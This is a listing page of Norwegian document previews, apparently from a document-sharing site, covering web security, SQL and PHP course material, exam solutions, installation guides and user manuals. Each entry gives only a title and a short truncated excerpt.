Bruker dokumentasjon Web sikkerhet. Universitet i Stavanger Bruker dokumentasjon Web sikkerhet Universitet i Stavanger Innhold Bruker dokumentasjon... 1 Webtrafikk sikkerhet... 1 Universitet i Stavanger... 1 UiS Webtrafikk sikkerhet... 3 Bakgrunn... 3 Hvordan virker

Detaljer

Kjøre Wordpress på OSX

Kjøre Wordpress på OSX Kjøre Wordpress på OSX Alt etter hva du ønsker å bruke Webserveren til er det flere måter å gjøre dette på. Ønsker du kun en side som skal dele sider du lager manuelt, med PHP, GD etc eller med server

Detaljer

Kapittel 11. Databasesikkerhet

Kapittel 11. Databasesikkerhet Kapittel 11 Databasesikkerhet Læringsmål: SQL-injection er en alvorlig sikkerhetsmessig trussel i webløsninger i dag. Etter å ha jobbet med dette kapittelet skal du forstå hvordan SQL-injection-angrep

Detaljer

Compello Invoice Approval

Compello Invoice Approval Compello Invoice Approval Godkjenning Webmodul brukerdokumentasjon Nettbrett og desktop via nettleser Index 1 Innledning... 3 2 Funksjonalitet... 4 Nettbrett og desktop via nettleser... 4 2.1.1 Desktop

Detaljer

Operativsystemer og nettverk Løsningsforslag til eksamen 01.12.2014. Oppgave 1. a) Linux-kommando: java Beregn & b) Shellprogram:

Operativsystemer og nettverk Løsningsforslag til eksamen 01.12.2014. Oppgave 1. a) Linux-kommando: java Beregn & b) Shellprogram: Operativsystemer og nettverk Løsningsforslag til eksamen 01.12.2014 Oppgave 1 a) Linux-kommando: java Beregn & b) Shellprogram: java Beregn & java Beregn Eventuelt, hvis man vil gjøre det med bare en linje

Detaljer

Et forsøk på definisjon. Eksempel 1

Et forsøk på definisjon. Eksempel 1 [Kurssidene] [ ABI - fagsider bibin ] Introduksjon Michael Preminger (michael.preminger@hioa.no) 13/12-13 I denne forelesningen: Utvikling av dynamiske nettsteder med PHP og databaser, våren 2014 Motivasjon:

Detaljer

Bruk av NetBeans i JSP-delen av Web-applikasjoner med JSP og JSF

Bruk av NetBeans i JSP-delen av Web-applikasjoner med JSP og JSF Bruk av NetBeans i JSP-delen av Web-applikasjoner med JSP og JSF Else Lervik, august 2010 (Av hensyn til JSF-delen av kurset anbefaler vi at du sørger for å ha NetBeans-versjon 6.9.) I den grad denne veiledningen

Detaljer

Produktdokumentasjon. Madison Møbler Administrasjonsside og Nettbutikk

Produktdokumentasjon. Madison Møbler Administrasjonsside og Nettbutikk Produktdokumentasjon Madison Møbler Administrasjonsside og Nettbutikk 1 1. Forord 1.1 Dokumentasjonen Dette er en teknisk dokumentasjon på produktet som er utviklet. Denne er tiltenkt personer med teknisk

Detaljer

Web fundamentals. Web design. Frontend vs. Backend 17.01.2008. Webdesign 17. januar 2008 3. Monica Strand

Web fundamentals. Web design. Frontend vs. Backend 17.01.2008. Webdesign 17. januar 2008 3. Monica Strand Web fundamentals Webdesign 17. januar 2008 Monica Strand Webdesign 17. januar 2008 1 Web design Fagområdet Web design inneholder flere disipliner Grafisk design Informasjonsdesign Brukergrensesnittdesign

Detaljer

Denne rapporten er beregnet for dataansvarlig på Grefsenhjemmet, den som skal installere, vedlikeholde og modifisere systemet.

Denne rapporten er beregnet for dataansvarlig på Grefsenhjemmet, den som skal installere, vedlikeholde og modifisere systemet. Produktrapport Forord Denne rapporten er beregnet for dataansvarlig på Grefsenhjemmet, den som skal installere, vedlikeholde og modifisere systemet. Dataansvarlig eller supporter trenger informasjon om

Detaljer

1. SQL datadefinisjon og manipulering

1. SQL datadefinisjon og manipulering Avdeling for informatikk og e-læring, Høgskolen i Sør-Trøndelag SQL datadefinisjon og manipulering Tore Mallaug 7.10.2008 Lærestoffet er utviklet for faget Databaser 1. SQL datadefinisjon og manipulering

Detaljer

Forelesning 23/9-08 Webprog 1. Tom Heine Nätt

Forelesning 23/9-08 Webprog 1. Tom Heine Nätt Forelesning 23/9-08 Webprog 1 Tom Heine Nätt Kursinfo Tom Heine Nätt E-post: tom.h.natt@hiof.no Mobil: 92012120 MSN: thnatt@hotmail.com All nødvendig info (forhåpentligvis) finnes på kursets webside: http://www.it.hiof.no/webprog1

Detaljer

Eksamen i Internetteknologi Fagkode: ITE1526

Eksamen i Internetteknologi Fagkode: ITE1526 Datateknikk Side 1 av 8 Eksamen i Internetteknologi Fagkode: ITE1526 Tid: Mandag, 23.05.05, 9:00-12:00 Tillatte hjelpemidler: Alle trykte og skrevne hjelpemidler tillatt. Eksamen består av 3 oppgaver og

Detaljer

Brukermanual til Domenia Norges adminløsning

Brukermanual til Domenia Norges adminløsning Brukermanual til Domenia Norges adminløsning 1. Login For å logge inn på løsningen din skriver du inn domenenavnet ditt og /siteadmin (f.eks www.domenia.no/siteadmin ). Skriv inn brukernavn og passord

Detaljer

if-tester Funksjoner, løkker og iftester Løkker og Informasjonsteknologi 2 Læreplansmål Gløer Olav Langslet Sandvika VGS

if-tester Funksjoner, løkker og iftester Løkker og Informasjonsteknologi 2 Læreplansmål Gløer Olav Langslet Sandvika VGS Løkker og if-tester Gløer Olav Langslet Sandvika VGS 29.08.2011 Informasjonsteknologi 2 Funksjoner, løkker og iftester Læreplansmål Eleven skal kunne programmere med enkle og indekserte variabler eller

Detaljer

Bruk av Domenia Norges AS Webmail

Bruk av Domenia Norges AS Webmail Bruk av Domenia Norges AS Webmail Domenia Norges webmail finner du på adressen http://webmail.domenia.no Hva trenger jeg? Du trenger en e-postkonto, samt brukernavn og passord til denne kontoen. Dersom

Detaljer

Oblig 4 Webutvikling. Oppgave

Oblig 4 Webutvikling. Oppgave Oblig 4 Webutvikling Oppgave Lag din egen Wordpress- site der du tester ut CMS- systemet. Det å lage egne templates fra bunnen kan være noe komplisert, så det holder for dette prosjektet om dere modifiserer

Detaljer

MySQL. Historikk. Nedlasting og installasjon

MySQL. Historikk. Nedlasting og installasjon 1 MySQL MySQL kan lastes ned gratis fra Internett (dev.mysql.com/doc). Vi forklarer hvordan man laster ned og installerer verktøyet, og også hvordan man kommer i gang med å lage databaser i MySQL. Historikk

Detaljer

- reklamebannere mobil og tablet

- reklamebannere mobil og tablet Spesifikasjoner - reklamebannere mobil og tablet FINN.no Versjon 2.4 Sist oppdatert 16.08.2013 1. Innhold Innhold Introduksjon Målsetning Spesifikasjoner HTML Fysisk størrelse 225 px* Eksempler Størrelser

Detaljer

IT for medisinsk sekretær Fredrikstad Kai Hagali

IT for medisinsk sekretær Fredrikstad Kai Hagali IT for medisinsk sekretær Fredrikstad Internet explorer Program for å komme inn på web sider på www Husk internet er en del mer enn www Nettleser webleser browser Synonym for samme ting. Internett Nett

Detaljer

En bedre verden med AJAX

En bedre verden med AJAX En bedre verden med AJAX Frode Eika Sandnes Hva er AJAX Har ikke noe med rengjøringsmidler å gjøre AJAX er et (morsomt) akronym Asynchronous Javascript And XML Henskikt: lage interaktive webapplikasjoner

Detaljer

Hva skjer i Open Web Application Security Project (OWASP)?

Hva skjer i Open Web Application Security Project (OWASP)? Hva skjer i Open Web Application Security Project (OWASP)? Kåre Presttun kaare@mnemonic.no Agenda Hva er OWASP Hvorfor er applikasjonssikkerhet viktig Prosjekter i OWASP Konferanser Først Hva er OWASP?

Detaljer

Flytte Lønn 5.0 fra SQL 2000 til SQL 2005 / 2008

Flytte Lønn 5.0 fra SQL 2000 til SQL 2005 / 2008 Flytte Lønn 5.0 fra SQL 2000 til SQL 2005 / 2008 Før du flytter databasene til Lønn 5.0 fra SQL Server 2000 til SQL Server 2005 / 2008 må du ta backup av databasene. Hvis SQL Server 2005 /2008 ikke allerede

Detaljer

Siteimprove analytics Tekniske spesifikasjoner

Siteimprove analytics Tekniske spesifikasjoner Siteimprove analytics Tekniske spesifikasjoner whitepaper Hvem er Siteimprove? Siteimprove er den eneste softwaren innen web governance som gjør det lettere å administrere og opprettholde ditt nettsted

Detaljer

Innføring i bruk av CGI4VB

Innføring i bruk av CGI4VB Innføring i bruk av CGI4VB Her kommer en enkel innføring i bruk av modulen CGI4VB som kan benyttes for å lage CGI programmer i Visual Basic. CGI er en forkortelse for Common Gateway Interface den kommunikasjonsprotokollen

Detaljer

WEBUTVIKLING OBLIG 4. Installasjon

WEBUTVIKLING OBLIG 4. Installasjon WEBUTVIKLING OBLIG 4 Installasjon 1. Jeg lastet ned MAMP gratis fra www.mamp.info og installerte på maskinen. Trykker så på Start Server og ser at det fungerer når Apache Server og MySQL Server lyser grønt.

Detaljer

Blant de mest omtalte Internett tilpassningene i dag er brannmurer og virtuelle private nett (VPN).

Blant de mest omtalte Internett tilpassningene i dag er brannmurer og virtuelle private nett (VPN). Innledning Vi har valgt brannmurer som tema og grunnen til dette er de stadig høyere krav til sikkerhet. Begrepet datasikkerhet har endret innhold etter at maskiner ble knyttet sammen i nett. Ettersom

Detaljer

Tjenestebeskrivelse Webhotelltjenester

Tjenestebeskrivelse Webhotelltjenester Tjenestebeskrivelse Webhotelltjenester Sist endret: 2004-12-01 Innholdsfortegnelse 1 INTRODUKSJON... 3 1.1 GENERELT... 3 1.2 NYTTEVERDI WEBHOTELLTJENESTER FRA TELENOR... 3 2 FUNKSJONALITET... 4 2.1 INNHOLD

Detaljer

lagring med HTML5 Offline lagring Offline Informasjonsteknologi 2 Gløer Olav Langslet Sandvika VGS

lagring med HTML5 Offline lagring Offline Informasjonsteknologi 2 Gløer Olav Langslet Sandvika VGS Offline lagring med HTML5 Gløer Olav Langslet Sandvika VGS Leksjon 8 Informasjonsteknologi 2 Offline lagring I IT1 brukte vi databaser til å lagre data. Der kunne vi bygge tabeller og fylle dem med innhold

Detaljer

BRUKERHÅNDBOK FOR NETTVERKET

BRUKERHÅNDBOK FOR NETTVERKET BRUKERHÅNDBOK FOR NETTVERKET Lagre utskriftslogg til nettverk Version 0 NOR Definisjoner for merknader Vi bruker følgende ikon i denne brukerhåndboken: Merknader forteller hvordan du bør reagere på en

Detaljer

NorskInternett Brukermanual. Sist oppdatert 09.08.15. Side 1/30

NorskInternett Brukermanual. Sist oppdatert 09.08.15. Side 1/30 NorskInternett Brukermanual Sist oppdatert 09.08.15. Side 1/30 Innholdsliste Hvordan kan vår tjeneste brukes...2 Hva vi leverer...2 Kontoinformasjon...3 Bruk av VPN tilkobling...3 Konfigurering av Android...4

Detaljer

Tjenester i Internett. E-post, HTTP, FTP, Telnet

Tjenester i Internett. E-post, HTTP, FTP, Telnet Tjenester i Internett E-post, HTTP, FTP, Telnet 1 I dag SMTP - Elektronisk Post (E-post) FTP File Transfer Protocol HTTP Hyper Text Transfer Protocol Telnet 2 Først: Noen svar på oppgaven Hvorfor studerer

Detaljer

HØGSKOLEN I SØR-TRØNDELAG

HØGSKOLEN I SØR-TRØNDELAG HØGSKOLEN I SØR-TRØNDELAG Avdeling for informatikk og e-læring - AITeL Kandidatnr: Eksamensdato: 11. mai 2004 Varighet: Fagnummer: Fagnavn: Klasse(r): 3 timer LV197D Webprogrammering med PHP FU Studiepoeng:

Detaljer

Installasjon av webtjener

Installasjon av webtjener Installasjon av webtjener Installasjon/Konfigurering Installasjon av webtjener Oppsett av kataloger som skal være tilgjengelig på web Spesifisering av aksesskontroll - i henhold til sikkerhetspolitikk

Detaljer

Administrator guide. Searchdaimon ES (Enterprise Server)

Administrator guide. Searchdaimon ES (Enterprise Server) Administrator guide Searchdaimon ES (Enterprise Server) Collections/Resourses... 3 Overview... 3 Crawl now... 3 Manage... 3 Delete... 5 Scan... 5 Start a new scan... 5 View results... 9 Delete... 9 Add

Detaljer

Installasjonsveiledning

Installasjonsveiledning Installasjonsveiledning Magne Rodem og Jan-Erik Strøm 18. juni 2006 Innhold 1 Installasjon av Web Service 3 1.1 Krav........................................... 3 1.2 Installasjon av Sun Java System Application

Detaljer

ff Brukermanual ebladadmin Pro

ff Brukermanual ebladadmin Pro ebladadmin ebladadmin er en nettbasert publiseringsløsning for publisering av eblad (digitale magasiner, publikasjoner, DM, årsrapporter, tilbudsaviser, kataloger, produktpermer, bruksanvisninger, mm)

Detaljer

Lønn 5.0. Veiledning for ASP leverandører

Lønn 5.0. Veiledning for ASP leverandører Lønn 5.0 Veiledning for ASP leverandører Om denne veiledningen Innhold Om denne veiledningen... 2 Installere første database og programmet... 2 Installere flere databaser på samme server... 2 Sette opp

Detaljer

Grunnleggende om websider og HTML-kode

Grunnleggende om websider og HTML-kode Grunnleggende om websider og HTML-kode Html er et språk / en standard som brukes for å gi instrukser til nettlesere om hvordan ulike elementer på en webside skal fortolkes og presenteres for en sluttbruker.

Detaljer

Huldt & Lillevik Ansattportal. - en tilleggsmodul til Huldt & Lillevik Lønn. Teknisk beskrivelse

Huldt & Lillevik Ansattportal. - en tilleggsmodul til Huldt & Lillevik Lønn. Teknisk beskrivelse Huldt & Lillevik Ansattportal - en tilleggsmodul til Huldt & Lillevik Lønn Teknisk beskrivelse Huldt & Lillevik er trygghet Trygghet er å vite at løsningen du bruker virker, hver eneste dag, enkelt og

Detaljer

Manual for Testledere i Finansnæringens autorisasjonsordninger

Manual for Testledere i Finansnæringens autorisasjonsordninger Manual for Testledere i Finansnæringens autorisasjonsordninger Oppdatert manual kan lastes ned fra www.finaut.no Side 1 av 14 Innholdsfortegnelse Innhold Innholdsfortegnelse... 2 1. Testlederens rolle...

Detaljer

FTP Info til brukerne

FTP Info til brukerne FTP Info til brukerne Ftp-serveren til Statens vegvesen er tenkt benyttet for brukere som trenger å utveksle store filer. Det presiseres at ftp-serveren kun er beregnet for utveksling av filer, ikke for

Detaljer

Innføring i bruk av CGI4VB

Innføring i bruk av CGI4VB Innføring i bruk av CGI4VB Her kommer en enkel innføring i bruk av modulen CGI4VB som kan benyttes for å lage CGI programmer i Visual Basic. CGI er en forkortelse for Common Gateway Interface den kommunikasjonsprotokollen

Detaljer

LO130A Webpublisering. Forelesning 1 23.08.04

LO130A Webpublisering. Forelesning 1 23.08.04 LO130A Webpublisering Forelesning 1 23.08.04 1 I dag Leksjon 1: Internett, webservere og nettlesere. Leksjon 2: Innledende om (X)HTML. 2 Kort om historien til INTERNETT ARPA-net (Advanced Research Project

Detaljer

Velkommen til Pressis.

Velkommen til Pressis. 1 Velkommen til Pressis. Dette er et veiledende dokument med linker i innledningen. Veiledningene vil ta deg igjennom de forskjellige tilkoblings muligheter du har med oss. Hvis du bare har behov for en

Detaljer

Produktrapport Gruppe 9

Produktrapport Gruppe 9 Forord Dette dokumentet er ment for personer som skal vedlikeholde, endre eller utvikle systemet. Produktdokument innholder informasjoner om programmets funksjoner og hvordan de fungerer. Før bruk av dette

Detaljer

Manual for Testleder i Autorisasjonsordningen for finansielle rådgivere

Manual for Testleder i Autorisasjonsordningen for finansielle rådgivere Manual for Testleder i Autorisasjonsordningen for finansielle rådgivere Oppdatert manual og viktige nyheter finnes på www.autorisasjonsordningen.no M a n u a l f o r T e s t l e d e r V.12 20130115 Side

Detaljer

Ulike DBMSer. Mest kjente: Oracle PostGreSQL* MySQL* SQLServer* DB2 SQLite Access (DBMS og utv. verktøy i ett) *Skal benyttes i kurset.

Ulike DBMSer. Mest kjente: Oracle PostGreSQL* MySQL* SQLServer* DB2 SQLite Access (DBMS og utv. verktøy i ett) *Skal benyttes i kurset. Ulike DBMSer Mest kjente: Oracle PostGreSQL* MySQL* SQLServer* DB2 SQLite Access (DBMS og utv. verktøy i ett) osv *Skal benyttes i kurset. Tom Heine Nätt / Edgar Bostrøm Hva er likt for disse (De fleste

Detaljer

Brukerveiledning for identifisering med BankID

Brukerveiledning for identifisering med BankID Brukerveiledning for identifisering med BankID Innledning Denne brukerveiledningen tar kun for seg identifisering med BankID med sikkerhetskort. Brukerveiledningen vi ikke inneholde beskrivelse av alle

Detaljer

praktiske eksempler DOM Document Object Model DOM og Høst 2013 Informasjonsteknologi 2 Læreplansmål Gløer Olav Langslet Sandvika VGS

praktiske eksempler DOM Document Object Model DOM og Høst 2013 Informasjonsteknologi 2 Læreplansmål Gløer Olav Langslet Sandvika VGS DOM og praktiske eksempler Gløer Olav Langslet Sandvika VGS Høst 2013 Informasjonsteknologi 2 DOM Document Object Model Læreplansmål Eleven skal kunne programmere med enkle og indekserte variabler eller

Detaljer

EKSAMEN. Emne: Webprogrammering med PHP (kont.) Webprogrammering 1 (kont.) Eksamenstid: 09.00-13.00

EKSAMEN. Emne: Webprogrammering med PHP (kont.) Webprogrammering 1 (kont.) Eksamenstid: 09.00-13.00 EKSAMEN Emnekode: ITM20606 ITF10208 Dato: Emne: Webprogrammering med PHP (kont.) Webprogrammering 1 (kont.) Eksamenstid: 09.00-13.00 05/06-2009 Hjelpemidler: 2 A4 ark (4 sider) med egenproduserte notater

Detaljer

TDT4237 Programvaresikkerhet Exercise 2. Kristian Ekle Stian Hegerland Hagen Thomas Gautvedt Tale Prestmo Martin Rechsteiner Marthe Øynes

TDT4237 Programvaresikkerhet Exercise 2. Kristian Ekle Stian Hegerland Hagen Thomas Gautvedt Tale Prestmo Martin Rechsteiner Marthe Øynes TDT4237 Programvaresikkerhet Exercise 2 Kristian Ekle Stian Hegerland Hagen Thomas Gautvedt Tale Prestmo Martin Rechsteiner Marthe Øynes 20. oktober 2014 Innhold 1 Secure password storage 1 1.1 The password

Detaljer

Brukerveiledning. Searchdaimon AS phone: +47 21554200 www.searchdaimon.com Østensjøveien 34 fax: +47 21554201 info@searchdaimon.

Brukerveiledning. Searchdaimon AS phone: +47 21554200 www.searchdaimon.com Østensjøveien 34 fax: +47 21554201 info@searchdaimon. Brukerveiledning Sluttbrukerveiledning Searchdaimon Client Tools v1.2.5... 2 Søkefelt... 2 Innstillinger... 3 Installasjonsveiledning Searchdaimon Client Tools... 5 Sluttbrukerveiledning Searchdaimon Client

Detaljer

9. ASP med databasekopling, del II

9. ASP med databasekopling, del II Else Lervik 23.03.2004 Opphavsrett: Forfatter og Stiftelsen TISIP Lærestoffet er utviklet for faget LV192D Web-programmering med ASP 9. Resymé: I forrige leksjon så vi hvordan ASP kunne brukes til å vise

Detaljer

Forklaring til bruk av webinterface på Cobalt RaQ2 server hos WebTjenester. Versjon 1.0 Runar Espeland Side 1 14.08.99

Forklaring til bruk av webinterface på Cobalt RaQ2 server hos WebTjenester. Versjon 1.0 Runar Espeland Side 1 14.08.99 Forklaring til bruk av webinterface på Cobalt RaQ2 server hos WebTjenester. Versjon 1.0 Runar Espeland Side 1 14.08.99 Innledning. Først vil vi takk for at du valgte WebTjenester som din samarbeidspartner,

Detaljer

BRUKERMANUAL. Telsys Online Backup

BRUKERMANUAL. Telsys Online Backup BRUKERMANUAL Telsys Online Backup TELSYS AS - 06.08.2009 Innhold Generelt... 3 Kom i gang... 4 Installasjon av Telsys Online Backup Proff/Standard... 4 Start opp klienten for første gang!... 10 Logg inn...

Detaljer

Brukerdokumentasjon. Webservices og webklient for kodeverk/ kodeverdi verifisering

Brukerdokumentasjon. Webservices og webklient for kodeverk/ kodeverdi verifisering Brukerdokumentasjon Webservices og webklient for kodeverk/ kodeverdi verifisering Innholdsfortegnelse... 3... 3... 3... 3... 4... 4... 4... 4... 8... 9... 10!... 10 "... 11 # $... 11 1. Om systemet 1.1.

Detaljer

datatyper Hva er programmering? Variabler og Informasjonsteknologi 2 Kompetansesemål

datatyper Hva er programmering? Variabler og Informasjonsteknologi 2 Kompetansesemål Variabler og datatyper Gløer Olav Langslet Sandvika VGS Høst 2012 Informasjonsteknologi 2 Hva er programmering? Når du skal bake en kake følger du gjerne en oppskrift. Først er det beskrevet hva kaken

Detaljer

FRC-Feeder-E. Et sikkert og raskt verktøy for overføring av data til File Record Converter Versjon 1.11

FRC-Feeder-E. Et sikkert og raskt verktøy for overføring av data til File Record Converter Versjon 1.11 FRC-Feeder-E Et sikkert og raskt verktøy for overføring av data til File Record Converter Versjon 1.11 Installasjon FRC-feeder skal installeres på den computeren hvor dataene ligger. Les mer om dette under

Detaljer

KUNNSKAP.NO (versjon 7)

KUNNSKAP.NO (versjon 7) KUNNSKAP.NO (versjon 7) 1. Innlogging 1 2. Endre passord 1 3. Mine mapper 2 4. Hvordan jobbe med læremidlene? 2 5. Hvordan jobbe med oppgaver fra lærer? 4 6. Kalender 8 7. Internpost 8 8. Maskinkrav 10

Detaljer

Internett og pc Brukerveiledning

Internett og pc Brukerveiledning Internett og pc Brukerveiledning 1 Klar for internett fra Altibox? 2 Oppsett av trådløs router og brannmur i hjemmesentralen 3 Oppkobling av pc til internett med Windows Vista 4 Koble opp mot e-post/oppsett

Detaljer

Angrep. Sniffing ( eavesdropping )

Angrep. Sniffing ( eavesdropping ) Angrep Sniffing ( eavesdropping ) Host with TCP Services Klient Tjener Angriper Ethernet og passord Ethernet aldri sikkert mot avlytting Sniffing verktøy er vanlig Avlytter ulike protokoller Kan formatere

Detaljer

(X)HTML, CSS og JavaScript HTML. Det første dokumentet 26.11.2007. Grunnleggende programmering i Java Monica Strand 26.

(X)HTML, CSS og JavaScript HTML. Det første dokumentet 26.11.2007. Grunnleggende programmering i Java Monica Strand 26. (X)HTML, CSS og JavaScript Grunnleggende programmering i Java Monica Strand 26. november 2007 Gr. leggende Java 26. november 2007 1 HTML HTML = Hyper Text Markup Language Strukturerer tekstinnhold HTML

Detaljer

Soner. Soner kan. »» Ha medlemmer

Soner. Soner kan. »» Ha medlemmer SOSIAL PUBLISERING FOR ORGANISASJONER Origo er tre ting på en gang - et nettsamfunn, et publiseringsverktøy og et samarbeidsverktøy. Hos Origo kan du opprette ditt eget sosiale nettverk, med blogg, bildedeling

Detaljer

Som en del av denne prosessen, når verten har startet og nøkkelfilene ikke er å finne, lages et nytt sett automatisk.

Som en del av denne prosessen, når verten har startet og nøkkelfilene ikke er å finne, lages et nytt sett automatisk. De beste sikkerhetsrutiner for Symantec pcanywhere Dette dokumentet inneholder informasjon om forbedrede sikkerhetsendringer i pcanywhere 12.5 SP4 og pcanywhere Solution 12.6.7, hvordan viktige deler av

Detaljer

Brukerveiledning for Intelligent Converters MySQL Migration Toolkit IKA Trøndelag IKS 2012

Brukerveiledning for Intelligent Converters MySQL Migration Toolkit IKA Trøndelag IKS 2012 Om verktøyet Formålet med dette verktøyet er å migrere informasjon fra en databasevariant til en annen, i denne veiledningen fra Oracle til MySQL. Dette gjøres som første ledd i en avleveringsprosess.

Detaljer

P L A N I A 8 S Y S T E M K R A V PLANIA 8 SYSTEM KRAV. Plania 8 Systemkrav.docx 27.04.2015 1 av 8

P L A N I A 8 S Y S T E M K R A V PLANIA 8 SYSTEM KRAV. Plania 8 Systemkrav.docx 27.04.2015 1 av 8 PLANIA 8 SYSTEM KRAV Plania 8 Systemkrav.docx 27.04.2015 1 av 8 INNHOLD 1 INNLEDNING... 1-3 1.1 Generell beskrivelse... 1-3 1.1.1 Plania DESKTOP og Plania WEB... 1-3 2 SYSTEMKRAV... 2-4 2.1 Krav til ulike

Detaljer

Her prøver vi å gi en enkel introduksjon til Venstres publiseringssystem for nettsider (Venstre Publish):

Her prøver vi å gi en enkel introduksjon til Venstres publiseringssystem for nettsider (Venstre Publish): 9 IT i lokallaget 9.1 Hjemmesider Redigering av lokallagets hjemmesider skjer via et publiseringsverktøy som du finner på https://publish.venstre.no. Brukernavn og passord får du ved å henvende deg til

Detaljer

WP-WATCHER WORDPRESS SIKKERHET

WP-WATCHER WORDPRESS SIKKERHET WP-WATCHER WORDPRESS SIKKERHET WP-WATCHER BACKUP - SIKKERHETSKOPIERING «Hei! Jeg oppdaterte en plugin på siden min og nå kommer jeg ikke inn på siden min i det hele tatt. Kan du hjelpe meg?» «Hjelp! Jeg

Detaljer

Manual for Testledere i Finansnæringens autorisasjonsordninger

Manual for Testledere i Finansnæringens autorisasjonsordninger Manual for Testledere i Finansnæringens autorisasjonsordninger Oppdatert manual kan lastes ned fra www.finaut.no Side 1 av 14 Innholdsfortegnelse Innhold Innholdsfortegnelse... 2 1. Testlederens rolle...

Detaljer

Oblig 3 Webutvikling. Oppgave 1

Oblig 3 Webutvikling. Oppgave 1 Oblig 3 Webutvikling Oppgave 1 Ta for deg en selvvalgt bedrift (gjerne lokal/mindre) og tenk deg at du hadde fått i oppgave å være en SEOkonsulent for disse i én uke. På denne uken skulle du gjennomført

Detaljer